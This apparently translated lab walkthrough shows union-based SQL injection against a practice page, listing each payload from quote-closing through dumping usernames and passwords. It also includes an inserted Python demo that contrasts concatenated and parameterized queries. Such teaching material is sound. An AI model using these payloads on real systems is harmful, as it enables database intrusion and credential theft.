Initial page:
![](https://img-blog.csdnimg.cn/7b2c983e6a734c50840e8c0b59916286.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
Starting from the URL, pass the parameter ?id=1: the page displays normally.
![](https://img-blog.csdnimg.cn/2e15d8bce9fe4c02880b3084176cff3d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
When the parameter we pass is ?id=1', the page errors, which tells us this is a string-type injection: the original SQL statement with our input appended becomes ?id='1'', the page shows an error, and the error message contains an extra parenthesis.
![](https://img-blog.csdnimg.cn/cb729158926c40b392dc9757689dbd92.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
Guess that the SQL statement looks like this: select * from user where id=('$id')
The trailing ') can be commented out, so we only need to close the leading (' ourselves, and our payload becomes:
?id=1')--+
![](https://img-blog.csdnimg.cn/63f05b0435894336af12e34c07868bd1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
Next, use order by to guess the number of columns:
payload: ?id=1') order by $number--+ ($number is the variable; remember to comment out the rest of the statement)
$number=3: page displays normally
![](https://img-blog.csdnimg.cn/4c9c5201b0c2461ca7ff5e1ec5295a90.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
$number=4: page errors
So the column count is 3.
Next comes the union query, payload: ?id=-1') union select 1,2,3--+
![](https://img-blog.csdnimg.cn/ee4a5e57a7f14826b01f32e1cbbf5784.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
The columns that are echoed back are positions 2 and 3.
Now we can dump information.
database(): security
version(): 5.7.26
user(): root@localhost (root, the database's highest-privilege user)
@@version_compile_os: Win64
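To make the reasoning above concrete from the defending side, here is an added example (not part of the original post, and not the lab's own code) that rebuilds the guessed query shape `select * from users where id=('$id')` in an in-memory SQLite database, feeds it the same inputs the post uses (`1'`, `1')--+`, `order by 3` / `order by 4`, the union probe), and runs the identical query with a bound parameter for comparison. The table, rows and the `users` name are constructed for the demo; it also includes a tiny decoder for the hex-encoded names the post reads back later.

```python
import sqlite3

# Constructed sample schema with three columns, matching the "column count is 3"
# finding in the post. The rows are made up for this demo.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table users (id integer primary key, username text, password text)")
    con.executemany(
        "insert into users values (?, ?, ?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")],
    )
    return con


# The guessed vulnerable shape: the id value is pasted straight into the SQL text.
VULNERABLE_TEMPLATE = "select * from users where id=('%s')"


def build_vulnerable_query(user_id: str) -> str:
    """Return the SQL text the vulnerable page would execute for this id value."""
    return VULNERABLE_TEMPLATE % user_id


def run_vulnerable(con: sqlite3.Connection, user_id: str):
    """Execute the concatenated query. Returns (rows, None) or (None, error_text).

    An error_text is what the page surfaces as the "report error" response;
    a row list is what it surfaces as "normal display".
    """
    try:
        return con.execute(build_vulnerable_query(user_id)).fetchall(), None
    except sqlite3.Error as exc:
        return None, str(exc)


def run_parameterized(con: sqlite3.Connection, user_id: str):
    """The same query with a bound parameter: the input is data, never SQL syntax."""
    return con.execute("select * from users where id=(?)", (user_id,)).fetchall()


def decode_hex_name(hex_text: str) -> str:
    """Decode a hex()-encoded identifier such as the table names the post lists."""
    return bytes.fromhex(hex_text).decode("utf-8")


if __name__ == "__main__":
    con = make_db()
    for probe in ["1", "1'", "1')--+", "1') order by 3--+", "1') order by 4--+",
                  "-1') union select 1,2,3--+"]:
        print(repr(probe), "->", build_vulnerable_query(probe))
        print("   concatenated:", run_vulnerable(con, probe))
        print("   parameterized:", run_parameterized(con, probe))
    print(decode_hex_name("656D61696C73"))
```

Run it and compare the two columns: the concatenated query errors on `1'`, succeeds again once the `')` is closed and the rest commented out, errors on `order by 4` but not `order by 3`, and returns the literal `(1, 2, 3)` row for the union probe, which is exactly the signal chain the post follows. The parameterized query returns the matching row for `1` and an empty result for every other probe, because the whole string is compared as a value rather than parsed as SQL. This is the check to apply to any code that builds queries from request parameters.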
![](https://img-blog.csdnimg.cn/67d5710ffb9a4ed5afc29ba1f3fcdabe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
Get the table names, payload: ?id=-1') union select 1,2,group_concat(hex(table_name)) from information_schema.tables where table_schema=database()--+ (hex is used to receive the data here because I haven't yet fixed the character-encoding mismatch between the database and the lab)
![](https://img-blog.csdnimg.cn/6dd24d360fb94a4699f8d0a76840b01b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
656D61696C73:emails
7265666572657273:referers
756167656E7473:uagents
7573657273:users
At this point we usually go further based on the names, so let's start with the users table and get its column names. Payload:
?id=-1') union select 1,2,group_concat(hex(column_name)) from information_schema.columns where table_name='users'--+
(the screenshot can't fit everything)
![](https://img-blog.csdnimg.cn/5def51c076314d83b9ab934c51923bbf.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
55534552:USER
43555252454E545F434F4E4E454354494F4E53:CURRENT_CONNECTIONS
544F54414C5F434F4E4E454354494F4E53:TOTAL_CONNECTIONS
6964:id
757365726E616D65:username
70617373776F7264:password
Next is getting the username and password; once we have those we can do whatever we want. Payload:
?id=-1') union select 1,2,group_concat(username,0x3a,password) from users--+
(0x3a is the colon!)
![](https://img-blog.csdnimg.cn/af1fe108be6e49e8b05ba7896bbfd726.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
After that we can do whatever we want!